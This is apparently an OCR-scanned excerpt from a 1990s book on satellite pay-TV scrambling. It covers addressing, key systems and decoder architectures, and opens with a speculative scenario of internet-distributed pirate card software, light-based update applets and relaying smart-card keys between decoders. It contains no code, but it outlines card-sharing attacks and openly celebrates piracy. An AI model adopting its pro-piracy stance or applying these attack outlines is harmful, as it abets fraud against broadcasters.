The following section requires a bit of a leap of imagination. It is set in the 
not too distant future. Think of the movie “Bladerunner” and you will get 
some of the atmosphere. 


Imagine, if you will, a European Community where the half-baked recom- 
mendations in the Green Paper have come to fruition. The legislation to 
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cover up the mistakes in poorly designed systems has been implemented. It 
is now illegal to sell, buy or use a pirate device in the EU. For hackers, 
Europe has become a technological tyranny. 


To paraphrase Thomas Jefferson, the tree of liberty must be refreshed from 
time to time with the blood of patriots and tyrants. Those believers in liberty, 
the hackers, are getting caught on a regular basis. The court actions against 
hackers and pirates are now little more than production-line criminal 
convictions. Piracy on Digital Television systems is falling to an almost 
acceptable level. Then some hackers decide that it is time for some 
gardening. 


1. A SEASON Type Program 


Pirate hardware has become more difficult to transport in Europe. Hardware 

-based hacks are fading out of use. Importing pirate devices from outside the 
EU has also become more difficult. The European Customs have been 
forced by Directive to devote time to this problem instead of the spending it 
on more serious problems like drugs. 


But the problems of hackers and pirates are often similar to those faced by 
the channels under attack. The key issue is payment. After all, for a pirate to 
finance and attack on a service, there must be some guarantee of revenue. 
This is the rock upon which many a venture has been dashed. 


The solution to the problem is a software based hack. Among the many 
attractions of such a hack is one fundamental aspect. It is unstoppable. 
Since it is essentially a stream of bits, it can be transmitted by telephone 
line, by dial-up bulletin board (BBS), by internet. There is not a thing that the 
anti-piracy enforcement can do about it. 


Of course at this stage, you are probably wondering how the pirates can 
stop a SEASON type program from being spread all over the place without 
payment. With the SEASON emulator programs, anyone could get them of 
the internet and the BBSes and run them. The temporary solution that some 
pirates came up with was a dongle. The problem is that hardware 
distribution is difficult in this situation. 


The hacker solution to the problem is clever. It relies on the fact that each 
pirate program has been made unique. And for the user to redistribute his 
program would result in his conviction. After all, it would include his name, 
address, telephone number, e-mail and credit card details. 


Naturally such a program would have to be encrypted for transport over the 
internet and BBSes. The Pretty Good Privacy cryptography may be used for 
this. Hackers and pirates do not pay any attention to the morons in the 
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European Commission who want to introduce a common cryptography 
standard. The result is that the encryption on the pirate software is too hard 
for the channels to crack. 


In the event of an ECM, an upgrade would be available via the internet and 
the BBSes. This would be patched into this SEASON type program. 


The SEASON program has been modified considerably since Markus Kuhn 
wrote the initial SEASON7 hack in 1994. The new SEASON program has 
been taken over by pirates and takes full advantage of the technology. 


The updates are based on light. The update patch for the SEASON program 
is distributed by means of a JAVA applet. It is a flickering light applet that 
just, well, flickers. The timing of the flickering transmits the update. This can 
be used with the newer generation of battery cards or interfaces that have a 
phototransistor update facility. It is simply a case of putting the battery card 
or interface up to the television screen or computer monitor to have it 
updated. 


The interface for the computer to decoder also includes such a light based 
interface. Let's call it "Firelyte". In this manner, the security of the situation is 
improved. There is no update patch as such (as an EXE or ZIP file) to be 
transmitted over the internet. The “Firelyte” applet will be hidden in many 
sites over the internet. Anyone could find them with their WWW browser. 
The beautiful part about all of this is that the new Digital IRDs actually 
distribute the patch over their internet connection option. 


Some commentators have said that the Digital Television IRDs will be used 
for internet delivery. What better way for the hackers and pirates to deliver 
the pirate SEASON program and the patches? 


The proposals to have the ownership of pirate devices and pirate digital 
television IRDs made a criminal offence and to have the devices subject to 
seizure are really insane when taken with the above hack. Since the digital 
IRD downloads the JAVA applet and runs in, it would hypothetically become 
a pirate device and therefore subject to seizure. It would follow, hypotheti- 
cally speaking, that all IRDs that run this applet become pirate devices. 
Therefore it might be possible to wipe out a market. 


If one service decides that another service is becoming too difficult to 
compete with, it may develop a virus that would open all channels on the 
opposing service's IRD. By downloading this virus they would render all the 
opposing service's IRD's liable to seizure. Perhaps the best day to execute 
such an attack would be on April first. 
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2. The McCormac Hack - The Digital Version 


For those still unfamiliar with the McCormac Hack theory, here is a brief 
explanation. The hack was first published in 1989 as a hypothetical attack 
on VideoCrypt. It worked perfectly - otherwise | would probably not have 
published it. If a live datastream can be lifted from a validated decoder and 
used to activate other decoders, the system is compromised. Applied to 
smart cards, this means if the datastream from one validated card can be 
transmitted and used in other decoders, then that system is insecure. All of 
the current systems in operation are, by this definition, compromised. 


Theoretically the IRDs or decoders would have to share the same identity 
number but that is the easy part. It is possible to zero the decoder's identity 
register and give it a new identity number. It is a common practice with the 
DSS pirate cards that reprogram the IRD to the same serial number as the 
pirate card. 


The original theory envisaged the distribution of the datastream via radio 
transmitters, modems and cable. Of course with the proliferation of the 
internet, a ready made path exists. 


The primary difference between the 1989 and the digital versions of the 
hack is that the internet is used to route the seed keys. The original theory 
had a radio connection for distribution. There is apparently a radio based 
version of the hack in operation in Spain on an MMDS network. 


In the digital version, the theory is that the dataflow between a legitimate 
smart card and a decoder will be monitored via a Season type interface. 
The PC would then rebroadcast the keys via the internet to a number of 
satellite PCs. The satellite PCs would have their own Season type interface 
which would be hooked into a decoder or IRD running on the same channel 
as the master. 


Of course the disadvantage is that only one channel can be handled at any 
given time. It would be possible for the same kind of setup to be duplicated 
for each channel. As a result all of the premium channels could be hacked. 


In order to run such an operation, a multitasking operating system would be 
required by the PC. This rules out DOS and Windows. The most likely 
candidate for this type of operation would be Linux. Hypothetically, Windows 
95 could be used. 


The most critical aspect of such a hack would be the routing time between 
the server PC and the satellite PCs. If this is too great then the seed will not 
arrive in time. The time taken for routing can easily be established with a 
traceroute command. 
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The main traffic on the internet link would be the seeds and the ZKT tests. 
However it might be possible for News Datacom to make the 74 packets 
interdependent and perhaps to tighten up the timing. EuroCrypt-M, with it's 
long cycle of 10.24 seconds is completely vulnerable to this type of hack. 
Given the way that the committee designed EuroCrypt-M turned out, DVB 
will fare better? Even though the DVB will not be designing the actual 
access control system, the fact that they are involved in designing the 
platform points to the fact that the access control module to scrambling 
section interface will be vulnerable. 


The software for this hack might take the form of an Internet Phone type 
application using a form of pseudo IRC to distribute the seed keys. Since 
the VideoCrypt system in Europe is not reliant on the IRD or the decoder 
having a serial number the hack would probably work without hassle on any 
decoder. However applying this type of hack to DSS would require all IRDs 
to have the same serial number. This is apparently easy to achieve as most 
of the pirate DSS cards now automatically reprogram the IRD's serial 
number when they are inserted. 


Back to the present! It seems that the recent moves against the hackers 
and pirates in Europe and North America has made the requirement of a 
secure distribution channel a necessity for survival. In reality, the Next 
Generation Season type hack is best suited to this as it can be distributed 
via the internet and the BBSes from outside the target jurisdiction. 


Divergence Or Convergence? 


The term “convergence” is a buzz word much in favour with the marketing 
people. The concept is that all of the transmission media are coming 
together. Things in the real world are slightly less clear. 


For the Blackbox industry, the strategy of "United We Stand - Divided We 
Fall” has been a recipe for disaster. In the business of scrambling systems, 
the more variety the less risk there is that a single hack will have a 
widespread effect. It is more a case of compartmentalised risk. Even after 
all the scrambling systems failures of the last few years, there are still idiots 
who believe in a single encryption system. Again real time experience is 
sadly lacking among them. 


It would be easy to apply the rules of evolution to this situation. Put simply, it 
will be the survival of the fittest. The system that can adapt and cope with 
hacking and the market demands will be the survivor. If a system is 
considered as a species, then it must continue to evolve and adapt to its 
environment. If it remains static then it becomes extinct. 
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The scrambling systems of the past few years are moving towards a 
non-static or fluid architecture. The smart card was evidence of this. In the 
event of a hack on the system, the smart card could be replaced. Of course 
the theory of the detachable secure processor has been dealt a cruel blow 
by economics. If the number of cards being used on a particular system 
becomes too large then replacing them may be prohibitive. 


Some channel executives regard piracy as a form of disease. For some of 
them it is a simple emotional response without any deep underlying logic. 
Strangely the concept of piracy as a disease or virus is a good one and 
perhaps a very accurate one. It also ties in nicely with the theory of evolution 
as applied to scrambling systems. 


If a hack is considered as a virus then the countermeasure is effectively the 
cure. Over a period a system will, like a biological system or organism, build 
up a defence against various types of hacks. This would come about as the 
various countermeasures are added to the system's datastream. 


If there is some diversity іп the implementation of the system then some of 
the hacks would only affect a few implementations. Of course there is 
always the potential for a Holy Grail hack. Such a hack would bring the 
system crashing down regardless of the differences between implementa- 
tions. In Human, terms it would have the same potential as Rabies. Except 
in this case only the executives of the hacked channels and system 
manufacturers foam at the mouth. 


Of course there are other factors involved here. A successful virus does not 
kill its host immediately. If it did so, then it could not spread and would die 
out. This is perhaps the self-defeating aspect of the Holy Grail hack. It is a 
victim of its own success. The channels using the hacked system will have 
their main fee gathering mechanism destroyed. As a result they may not 
Survive. 


The Ho Lee Fook hack can be classified as a Holy Grail hack. It affected all 
of the major implementations of VideoCrypt in Europe. Since the starting Ho 
Lee Fook on the 07 Sky card, all of the subsequent card issues, including 
the current 10 card (0A) have been hacked. DSS, a variant that built heavily 
on the 09 Sky card and the VideoCrypt-2 card, fell to the hackers. 


The Card Tricks hack on D2-MAC EuroCrypt-M was similarly a Holy Grail 
hack. While this system has far more potential than VideoCrypt it has a fatal 
flaw. It is a committee designed system. Some times you get the impression 
that the people on all these wonderful committees would, much to the horror 
of Humanity, have difficulty in operating a condom vending machine without 
a two hundred page specification document. 


1-23 


1: An Introduction To Scrambling 


The details of almost everything in this system except the hash algorithm 
were available. This fact alone gave hackers a very good insight into the 
operation of the system and led, eventually, to the hack. 


Of course the EuroCrypt-M system is more complex in implementation and 
security than VideoCrypt. When you read the EuroCrypt specification 
document, it is easy to appreciate the complexity, elegance and clumsiness 
of the system. There are many more possibilities for this system and it was 
such a shame that it based its security on a flaw; the designers did not 
envisage the smart card being hacked. 


Like VideoCrypt, the EuroCrypt-M system is smart card based. The main 
action that the users of the EuroCrypt-M system have taken against the 
hackers are mainly electronic countermeasures. These have been margin- 
ally successful. The hackers generally had solutions within a few hours 
though sometimes it can take a few weeks. 


Some rather naieve people have claimed that when digital television arrives 
hackers will disappear because it will be too difficult to hack. Yeah right! The 
same people, or their predecessors said the same thing about smart cards 
and VideoCrypt. The same people believe in unbreakable codes and 
publicity brochures. 


The best way to consider digital television is as a set of languages. 
Languages evolve. From a number of root tongues, the present multitude of 
languages sprung over the millennia. Dialects turned into languages. Words 
dropped out of usage and were replaced with new ones. Only the words that 
are in continued widespread usage tend to survive. 


Digital television is meant to be, to some at least, like some all unifying 
single language. To paraphrase the BBC motto; “and nation shall speak 
peace unto nation and perhaps get a comprehensible reply". However nice 
this would be, digital television is, in effect, a Tower of Babel for the 
twenty-first century. 


Whereas at first it will create the illusion of a single standard, whether it be a 
European standard, an American standard or even a Pacific Rim standard, 
it will rapidly diversify. Diversify is the best word here as degenerate has 
more of a backwards feel. The diversification will be more in the form of an 
evolution. 


The persistent, and perhaps many would argue fatal, problem of the 
systems developed in the late eighties and early nineties has been the 
"Frozen Architecture". To make a rather bad pun, the security or scrambling 
System is, once it leaves the development stage, etched in stone. 


1-24 


1: An Introduction To Scrambling 


There is very little that can be done to fix a hack on such a system. Over the 
nineteen eighties this fact became clearer and the embedded secure 
processor approach to system design was replaced with the detachable 
secure processor approach. The detachable secure process or smart card 
approach, though far short of the ideal, was a significant move away from 
the “Frozen Architecture”. 


Digital television systems have the necessary specification to be employed 
as “Fluid Architecture” systems. While there would be a common or root 
infrastructure, the main access control module would be more fluid. It could 
be changed in the event of a major hack that a smart card upgrade alone 
would not fix. The smart card upgrade would of course still be a low cost 
option. 


There аге two proposed encryption systems for Digital Television: MultiC- 
rypt and SimulCrypt. Of the two MultiCrypt is the best. The philosophy 
behind SimulCrypt has got to be that of a complete idiot - one hack and it is 
all hacked. Of course the people defending this proposed system seem to 
believe that they will be able to defeat the hackers and pirates. Of course 
this did not work in the past. 


Digital television, however, is only a medium. What will protect the signals is 
the security overlay. If this overlay is insecure then it will be hacked. For 
example, the VideoGuard system is the pay television security overlay 
developed by News Datacom. The analogue implementation is called 
VideoCrypt. A different implementation is used to provide the security on the 
DirecTv system in the USA. That too was hacked. 


Other digital television systems are also under development. What may well 
occur is some form of standards battle like that of VHS and Betamax. In 
either case the security of the system may be the factor that decides the 
battle. 


The munitions in this battle will not be the programming, the movies and 
television programmes. It will be the internet. Which ever system сап 
facilitate the delivery of internet services in the best, simplest and most 
user-friendly manner will probably win. 


At this point in time it is very hard to believe in such a thing as a totally 
secure system. The purposes of a scrambling system are to prevent all but 
the most elegant of hacks and limit the effects of that most elegant of hacks 
- the Holy Grail. 


This simple lesson of scrambling system design has been ignored once too 
often. Publicity brochures are filled with inane claims that the manufacturing 
company are pro-actively involved maintaining the security of the system. 
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Such claims are generally only the product of a marketing meeting. What 
they are really trying to say is that they cannot guarantee the security of their 
system. 


It is impossible for any scrambling system manufacturer to truthfully 
guarantee his system. To do so would rule out any future development or 
discovery. Of course the marketing and PR people have to have some little 
bit of prestidigitation for the poor fools about to buy the system. 


In a somewhat romantic rationalisation, hacking could be the last vestige of 
a free society. In the USA, the government tried and failed to impose the 
Clipper chip on the public. It seems to be a part of a general move towards a 
big brother situation where there are no secrets from the government and 
cryptography is controlled. The rumblings of similar actions here in Europe 
have already been heard. The Council Of Europe seem intent on trying to 
impose a common encryption algorithm on Europe complete with back- 
doors so that the governments could eavesdrop on the private communica- 
tions of citizens. These people are fools and dangerous ones at that. They 
seek to take away our freedom and logically have to be stopped - 
democratically of course. 


It looks like some politicians would like to control what we say and think just 
as some idiots in the broadcasting industry think that there should be a 
single unified scrambling system. 


Fools try to control chaos and in the end the chaos consumes them. It looks 
like those who would impose such restraints on privacy do not appreciate 
the long term effects of their actions. 


A single system only requires a single hack. From that point on, everything 
looks to be a rearguard action. While the hack may not occur immediately, it 
will occur. 


The more protected something is - the more of challenge it is. When a 
system is portrayed as being impossible to hack, every hacker believes that 
it is only a temporary impossibility. Perhaps it is this sheer optimism that 
allies hackers with addictive gamblers. We all believe in, and often depend 
on, luck. 


Almost invariably this belief in luck pays off. Systems are hacked because 
someone overestimates the security of a component or, as is more 
frequently the case, someone makes a mistake. 


The players change but the game remains the same. It is stupid to claim 
that piracy will be eliminated, for if there was no crime then there would be 
no need for a police force and we'd all be vegetarian troglodytes. This is the 
real world - wake up and smell the coffee! 
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Information is the most valuable weapon in the arsenal of a hacker. 
With knowledge of all previous systems, a new system can be 
quickly cross-checked and identified. Of most import, the weak- 
nesses of the system can be detected. 


All hackers tend to amass a rather untidy collection of magazine 
articles, notes and manufacturer’s brochures. Very few hackers are 
over-enthusiastic about having everything filed away under relevant 
titles. In fact most of us tend to prefer the stable chaos system of 
filing. 


The stable chaos system of filing is where things are dumped in 
piles. Since the locations of the piles are governed by fuzzy logic, (as 
used by the mind), it is easier to locate some article that you read 
five years ago. Of course this is one hell of an excuse to use when 
some one accuses you of being untidy. It is so improbable that it is 
perfectly plausible and perhaps true. 


The objective of this chapter is to explore the principles and processes of 
scrambling systems. The first section is an introduction to the concepts of 
scrambling. The second section is a collection of case studies that illustrate 
the principles, processes and failures of various systems. 


The security of satellite transmissions is a complex topic. It combines many 
disciplines such as mathematics, psychology, and electronics. It also 
requires cunning and guile in large doses. To put it simply, it is the art of 
getting paid for a transmission. 


A scrambling signal is meant to protect an investment by the programme 
provider who pays for the copyright on a movie or series. In order to recover 
the costs and make a profit, he has to sell the programme on to a 
consumer. The consumer will pay for the right to watch the programme. The 
scrambling system is there to make sure that the consumer pays. 


The overriding concern when scrambling a signal is not the inate security of 
the system but rather the ease with which the system allows the revenue to 
be extracted. In effect it is all a sequence of compromises. 


The first and perhaps the most important compromise is cost based. For a 
large network of hundreds of thousands of subscribers, an economy of 
scale would exist. A highly secure system could be employed as the 
discounts for ordering in large quantities would make the decoders appear 
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cheap or at least less costly. At the opposite end of the scale, a network with 
only a few thousand subscribers would not be in a position to afford a highly 
secure system. The main factor that influences this is the fee that the 
subscriber will pay. 


The VideoCrypt system used by BSkyB is an excellent example of the 
economy of scale. There are about 8 million VideoCrypt decoders through- 
out Europe. Initially the only available format was a stand-alone decoder but 
various receiver manufacturers integrated the decoders into their receiver 
designs. The price of a stand-alone decoder now is in the region of £80. 
Most of the original stand-alone decoders ended up in mainland Europe 
where it is not legally possible to subscribe to BSkyB. 


This is a side effect of the cheap decoder. A potential pirate market is 
created for the channel's programming outside of the copyright area by the 
basic fact that the decoder is cheap. Now whether this market develops into 
a full blown pirate market or a Gray Market is a matter for the security of the 
system. 


If the subscription fee is high enough then the economy of scale model is 
turned around. It is necessary to protect the highest value programming with 
good security. A good example of this is the B-MAC system used by SIS 
Racing Channel in Europe. Though the system is hacked, the pirate 
decoders are selling for £1800. Even an unmodified decoder will cost about 
£600. The programming on this channel is high value and few are willing to 
pay £1800 for one channel. 


Like all technology, scrambling systems have finite lifetimes. This disturbing 
fact did not dawn on those responsible for choosing scrambling systems in 
the early eighties. After all it was a relatively hack free period since the 
information and skills required to hack services were not that widespread. 
Of course a more important fact underlying this was that most of the people 
selecting these systems had only previously worked in cable television. In 
cable television, thing move at a glacial pace and a system was often 
expected to have a lifetime of ten or fifteen years. 


In addition to the above, the people selecting the systems seem to have 
accepted the manufacturer's propaganda that it would be possible to 
upgrade the decoder in the event of any hack. This mode of thought can be 
seen most clearly in the Embedded Secure Microcontroller architecture 
covered later in this chapter. 


In Europe, at least, there were no services via satellite that could be 
considered of truly Pan-European attraction until about 1985. The majority 
of any scrambling was cable based. The people responsible for choosing 
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the system ran their calculations in terms of the cheapest available system 
and an operational lifetime of ten years or so. Towards the end of the 
eighties, this mode of thinking was being killed by reality. There were 
satellite based services that were being hacked to pieces and Pay TV 
executives were scurrying about in abject panic trying to convince them- 
selves and the media that piracy was not a real problem. 


This situation forced a rethink of strategies and technology. The move was 
to the finite lifetime system. As the technological skills and resources of the 
Blackbox industry advanced, the complexity of the scrambling systems had 
to be one step ahead. It had to be possible for the system to be completely 
overhauled if necessary and it frequently was. The best illustration of this 
was the move to smart card based systems. 


What Is A Scrambling System? 


Most manufacturers of systems would prefer that everyone had an image of 
a scrambling system as a black box. The signal would enter one side and 
emerge from another scrambled. This model is a lot easier the manufactur- 
ег salespeople since they don't have to memorise the facts. However, a 
scrambling system is a rather generic term for a complex operation that 
involves more than just the techniques used to render the picture 
unwatchable or the sound inaudible. There are three parts to each system; 
the addressing, the security architecture, and the techniques. 
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The Addressing Element 


There are basically two formats of system: addressable and non-address- 
able. The more cynical would consider these as being addressable and 
dead. 


In any pay television operation of over a few thousand subscribers and 
reasonably valuable programming, an addressable scrambling system is 
essential. It gives the channel some control over who watches and who 
doesn’t. The alternative is a non-addressable system and probable failure. 


If the channel has no control over the subscribers decoder then the 
subscriber can watch the programming after the subscription expires. 
Stolen decoders could be recycled without the knowledge of the channel. 
Perhaps more importantly from a copyrights point of view, these decoders 
could be shifted outside the original copyright area. This would create legal 
as well as security problems for the channel. 


Of course in defence of the non-addressable system, it is perhaps the 
fastest and cheapest method of getting a channel on air. This approach has 
been used in Europe to launch a few channels. Red Hot Dutch, a hardcore 
porn channel, used the SAVE system to get their service on air with the 
intention of switching to a more secure system within six months of the 
start-up. Reality cruelly skewed their plans and the channel collapsed. Of 
course the collapse owed more to the channel's management than to 
piracy. 


A major factor in this was that the SAVE system had been widely hacked in 
Europe for at least five years before their launch. Therefore there was an 
existing base of easily modified decoders available - it was just a case of 
changing a crystal. The frequency of the crystal chosen was a readily 
available one. As a direct result, many of the defunct pirate SAVE decoders 
were given a new lease of life for less than a pound. The problem for Red 
Hot Dutch was that they had no control over this pirate market. 


Had Red Hot Dutch gone for an addressable system from the start, things 
might have been slightly different. It would have taken longer to hack the 
system. In the longer hack timeframe, the channel would have had had a 
chance to get up and running. With a non-addressable system, the only 
thing preventing a complete disaster is the security of the techniques used 
to scramble the signal. Once the scrambling system is hacked, the channel 
is doomed. 
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Inclusion Or Exclusion Principle 


A scrambling system works by including all authorised decoders or by 
excluding all unauthorised decoders. This, on the surface may seem 
paradoxical because a scrambling system should do both. However on 
closer inspection, things become clear. 


In a system working on the Inclusion Principle, only those decoders that 
have been authorised and continue to be kept alive with a heartbeat signal 
will work. The heartbeat signal has to be received by the decoder otherwise 
it will shutdown. 


This type of system is more suited to a high bandwidth addressing system 
as each authorised decoder has to receive the heartbeat. 


The Exclusion Principle is the inverse. An authorised decoder will continue 
to work until it receives a drop-dead or kill signal. The IDs of the decoders to 
be switched off are transmitted in a sequence known as a Blacklist. 
Depending on the number of decoders to be switched off, the blacklist can 
be resent every few hours. 


In terms of bandwidth, this approach is more economic as it does not clutter 
the bandwith with activation data. 


In Band Addressing 


The simple definition for In Band Addressing is that the addressing data 
carried in the bandwidth of the scrambled signal. The typical area for the 
addressing data is in the Vertical Blanking Interval along with the VITS and 
teletext data. This form of addressing is also referred to as In Signal 
Addressing. 


Most of the systems on the market at present use this format of addressing. 
It is better suited to satellite transmissions as the data is part of the video 
bandwidth. 


With most of the newer system on the market tending to be digital systems, 
they naturally can use the bandwidth of the channel more effeciently. 
Therefore they tend to use addressing techniques that would be termed 
In-Band. 


Out Of Band Addressing 


Out of Band Addressing means that the addressing data is transmitted 
outside of the normal video channel bandwidth. Generally a separate data 
carrier is transmitted along with the signal. This type of addressing was 
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A Simplified Illustration Of The Inclusion Principle 


Headend Transmits Heartbeat Signal To Authorised Decoders 





” 
| Active 
Active | 
Whitelist Of Active Decoders > Active | 
This principle is well 
suited to the high 
bandwidth systems Inactive Decoder (No Heartbeat Signal) 


such as D2-MAC. 
The security weakness of this principle is that someone can 
replicate the heartbeat signal of the headend. 


A Simplified Illustration Of The Exclusion Principle 
Headend Transmits Kill Signal To Unauthorised Decoders 
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IDs of blacklisted decoders to be Ae 
transmitted. All other decoders remain active until they receive the 


kill signal addressed to them. 
The possible security weakness is that someone may find out how 


to block the kill signal. 
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used in the old FilmNet SATPAC system on satellite. Nowadays it is limited 
to cable based scrambling systems such as the Jerrold Tri-Mode system. 


The old FilmNet SATPAC system was a classic example of this format of 
addressing. It was essentially a cable based scrambling system that had 
been pushed into operation as a satellite based system. The authorisation 
datastream was transmitted on a subcarrier as were the resyching pulses. 


The Security Architecture Of A System 


The security architecture of a system determines how easy it is to recover 
from a hack. There are essentially two types of architecture; Embedded 
Secure Microcontroller and Detachable Secure Microcontroller. In many 
respects they reflect the thinking of different decades. The microcontroller is 
a version of microprocessor that has on chip ROM, EPROM and or 
EEPROM. It handles the access control in the decoder, processing the 
control signals and turning on or off channels. 


Embedded Secure Microcontroller 


The Embedded Secure Microcontroller is an architecture where the main 
decoder control is embedded in the circuitry of the decoder itself. All of the 
System's secrets are held in the decoder. This is the method that was 
favored from the seventies to the late eighties. It is also the most vulnerable 
architecture and is based on the fallacy that there is such a thing as a 
secure chip. 


Security in scrambling systems is fleeting. A chip can only be considered 
secure for a few months or a year at best. With commercially available 
expertise in popping chips, the likelihood of a widely used chip remaining 
secure is small. 


This kind of thinking dominated scrambling systems design up to about 
1988. It can be seen in decoder designs like the FilmNet SATPAC system, 
the Jerrold Starcom system, the VideoCipher Il system and the Scientific 
Atlanta B-MAC system. Of course all of these examples have one thing in 
common - they are all hacked. The hacks demonstrate the fundamental 
problem with the Embedded Secure Microcontroller architecture. Once 
there is a confirmed hack, it is difficult and expensive to upgrade all of the 
affected decoders. 


The decoder is also under the complete control of the subscriber. The 
subscriber can theoretically open and examine the decoder. In the worst 


2-7 


2: The Principles Of Security 


case he can modify the operation of the decoder and there is very little that 
can be done about it when this happens. 


The problem with an Embedded Secure Microcontroller approach to 
decoder architecture is that it is very expensive to recover from a hack. 
Each decoder would have to be modified by the channel. Naturally there are 
some who would put forth the argument that the hacked decoders could be 
updated over the air by the channel. The problem here is that once an 
Embedded Secure Microcontroller architecture decoder is hacked, it stays 
hacked. The hacker can watch whatever update is downloaded over the air 
and modify his hack to suit. 


Admittedly, the majority of systems now using this type of architecture are 
cable based scrambling systems. Cable based scrambling systems are 
better protected by legislation as they do not generally involved transna- 
tional coverage. Small cable systems in particular tend to go for the cheaper 
and less secure architecture strictly on the basis of cost. 


Detachable Secure Microcontroller 


The Detachable Secure Microcontroller was meant to work around the 
problems associated with the Embedded Secure Microcontroller architec- 
ture. It would allow the central element in the access control architecture to 
be detached and cheaply upgraded. This is the concept of the smart card. 


In this model, the decoder is dumb in that it does not hold any of the 
system's secrets. Therefore a hack on the decoder would not benefit a 
hacker. It is the smart card that has to be hacked. According to this model, if 
the smart card is hacked, it can be cheaply replaced. 


Of course this model works well on paper but is cruelly skewed by reality. 
For a large network with millions of subscribers, changing to a new smart 
card is a case of spending tens of millions of dollars. One flaw is that if the 
card is hacked, then the new card has to be a more secure version and 
naturally more expensive. The sheer scale of the expense means that it can 
be somewhat less than economical to upgrade every few months. 


As a direct result, the new card will be hacked within about four to six 
months. For example in the VideoCrypt system, it was initially intended that 
the card would be changed every three to six months. It would have been 
difficult to market a hack within this kind of timeframe. However when the 
sheer cost of the upgrades struck the accountants, the users of the system, 
BSkyB, tried to get about sixteen months to eighteen months from each 
smart card. It seems that in the last few card issues, the card has been 
completely hacked for at least twelve of those months. 
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Embedded Secure Microcontroller Design 
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The Embedded Secure Microcontroller approach was used widely 
in the mid to late 1980s. It is a largely dicredited approach to design 
as in the event of a hack, each decoder has to be modified. 


On a very large service with a subscriber base numbered in millions 
this is a very expensive operation, However for a small operation 
such as a cablenet with only a few thousand subscribers it is not 
that much of a financial risk. 


This kind of architecture is more suited to cablenet operation where 
the legislation exists to protect it. It is not viable on satellite services. 
This is because the threat may come from areas where there is no 
protective legislation that the service can avail of. 
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Most recent designs have followed this approach. Theoretically, the use of 
a smartcard makes the system cheaper to upgrade. However the 
economics of the situation have an effect. It is still ultimately more secure. 





2: The Principles Of Security 


What is apparent about this is that while the theory of the Detachable 
Secure Microcontroller is sound, the implementation is often flawed. These 
flaws are almost always financial and lead to the inevitable hacking of the 
system. 


Key Systems 


Many systems do not change their keys on a regular basis. The result of this 
generally is that they are catastrophically hacked. This stems from the 
complacency that permeates a channel when their system is intact. The 
business people, not understanding the situation, think that because the 
system is in tact at present, it will be intact in six months time. Of course the 
reality is that no system can be guaranteed to be intact six months into the 
future. 


The classical key system is known as a Hierarchical Key System. It is the 
messiest in terms of the number of keys involved. It is also typical of the 
Embedded Secure Microcontroller systems of the eighties. 


In this type of key system, the each decoder has its own unique secret key, 
which theoretically at least, is never divulged. Each month, all authorised 
decoders are sent the monthly key which is encrypted with individually with 
each decoder's unique key. This monthly key is decrypted in all authorised 
decoders and then used to decrypt the session key. The session key can be 
changed on a programme by programme basis or even every few seconds. 


This type of key system is more suited to a high bandwidth scrambling 
system. In practice, it common to find this key system in use on Inclusion 
Principle systems. A continuous whitelist has to be transmitted in addition to 
the other access control traffic. 


The alternative to the hierarchical form of key system is where the decoder 
or smart card contains all the necessary data and algorithms to decode the 
channel but will only do so when it is authorised to do so. 


In terms of data to be transmitted, this system is the more economical of the 
two. The only data flowing over the air is the turn-on and turn-off data. No 
keys have to be transmitted over the air. Instead a blacklist is transmitted 
continuously. The best example of this type of system is the VideoCrypt 
system. 


It is rare to find a system that relies on a completely hierarchical structure. 
Most of them tend to integrate some form of key update facility. The best 
example of this kind of system is the EuroCrypt-M system (see Chapter 9). 
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Example Of A Simple Key Protocol 
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" =| At the lowest level is the Operational 
Operational Key | key and this is continually changing, 
= — often every few seconds 


In a system like EuroCrypt, these keys 
would correspond to the Management 
Key, the Operational Key and the 
Control word. 
Most hacks only have access to the Operational key. Therefore they can use 
this to decode the Control Word. However should the Operational key change 
they will not be able to decode the Control Word. 


The Management key is used to encrypt the new Operational key. Thus a hack 
on the Management keys is far more serious. Many of the newer EuroCrypt 
channels have resorted to this kind of ECM. 
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Many systems do not change their keys on a regular basis. The reason for 
this is mainly that the system uses and access control or authorisation 
routine to determine what decoders should be allowed to decode the signal. 


The decoder or smart card may have the necessary key/algorithm 
combination to decode the signal but unless it is properly authorised, it will 
not decode the signal - well not unless it has been hacked. 


The fatal flaw in this approach of storing a valid key set and algorithm in the 
decoder or smart card was demonstrated with the hacking of VideoCrypt 
and EuroCrypt. If a system depends on the authorisation access control 
layer to permit the decoding of the signal without a regular key/algorithm 
update, then it is is completely compromised in the event of a hack. If the 
hacker can then make the key/algorithm combination function without the 
intervention of the access control layer, then only a complete change of 
cards or a decoder retrofit will cure the problem. 


The length between key changes on some of the D2-MAC EuroCrypt-M 
channels has baffled people. The theories on this abound. Some have 
claimed that the reason for the less than regular updates is because the 
channels are more interested in keeping existing subscriber's cards working 
without problems than in stopping the piracy. The real situation is more 
complex. 


On the affected channels, the fact that the management keys have been 
compromised is known to the channels. This means that the pirates can 
watch the new keys coming down over the air. The ordinary pirate card, not 
having the management key does not get the update and gets knocked out. 
The pirates can then offer the new key to pirate card users for an upgrade 
fee. Therefore why, the channels think, should they contribute to the bank 
accounts of the pirates by implementing a key change? 


The Techniques 


When all the hype of the manufacturers dies down, when the questionable 
claims of the PR people are ignored and when the techniques themselves 
are examined, it becomes clear that there are really only a few fundamental 
analogue scrambling techniques. 


Naturally, the manufacturers will claim that their system is totally different 
from another manufacturers system even while they are using the same 
scrambling technique. The difference is often based on the access control 
aspect. The proof is that a hack on a system using one technique can be 
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applied to another system from another manufacturer that uses the same 
technique. 


Most of the analogue techniques are gradually dropping out of use on 
satellite borne systems. This due more to the nature of hacking on satellite 
based systems than anything else. With a widely available system, the 
range of threats is greater. With more hackers working on the problem, the 
time until compromise is shorter. 


On a system relying on analogue techniques, a hack on the technique is 
generally fatal. Despite this, these techniques, or rather variants of these 
techniques continue to be used in cable based systems. The reasons are 
partly financial and partly technological. 


The hacks on satellite based systems are carried out at baseband. Cable 
based systems, however, seem to favour the use of RF based scrambling 
than baseband techniques. The use of techniques that can be applied at the 
RF stage make for cheaper production costs. 


For a hacker, all of the above means that attacking a cable based 
scrambling system in the same manner as attacking a baseband scram- 
bling system is doomed to probable financial failure. 


In order to hack an RF based system, a potential pirate decoder requires an 
RF stage. The best example of this is the cable based variant of Gated 
Synch Suppression. 


On a baseband system, Gated Synch Suppression means that the synch 
pulses, (and generally the rest of the horizontal blanking interval), are 
voltage shifted up into the active video region of the line. On an RF based 
implementation, the actual amplitude of the pulses is changed. 


Hacking the baseband version means that synch pulse would have to be 
voltage shifted down to the original level. Hacking the cable based (RF) 
variant means that the horizontal blanking section of the RF signal has to be 
amplified by the correct amount. So an RF hack would require an RF stage 
